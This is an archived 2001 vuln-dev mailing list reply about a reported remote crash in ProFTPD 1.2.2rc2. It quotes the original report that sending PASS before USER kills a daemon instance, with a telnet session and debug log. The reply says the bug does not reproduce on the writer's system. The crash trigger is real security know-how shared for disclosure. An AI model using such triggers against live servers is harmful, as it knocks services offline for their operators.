Odp: ProFTPD 1.2.2rc2 DoS

["ma" <marcin () kafejka metronet pl>]

Hello
This is not work on my Rh 7.0 and Proftp 1.2.2rc2
This is telnet output:

[root@kafejka /root]# telnet 0 21
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
220 kafejka.metronet.pl FTP server ready.
PASS
503 Login with USER first.

Marcin Chojna 
Only SysAdmin
----- Original Message ----- 
From: Daniel <daniel () sdf lonestar org>
To: <vuln-dev () securityfocus com>
Sent: Monday, June 04, 2001 12:53 AM
Subject: ProFTPD 1.2.2rc2 DoS


> I've discovered that ProFTPD 1.2.2rc2 has a bug - each instance of the
> daemon can be crashed remotely:
> This happens when the PASS command is received before the USER command:
> box:~# telnet 127.0.0.1 21
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
> 220 ProFTPD 1.2.2rc2 Server (ProFTPD Default Installation) [box.xxx.com]
> pass
> Connection closed by foreign host.
> box:~#
> If you run proftpd -d 5, (debug mode, level 5) in the logs you see:
> box.xxx.com (localhost[127.0.0.1]) - FTP session opened.
> box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden)
> box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)
>
>  - Daniel Volozov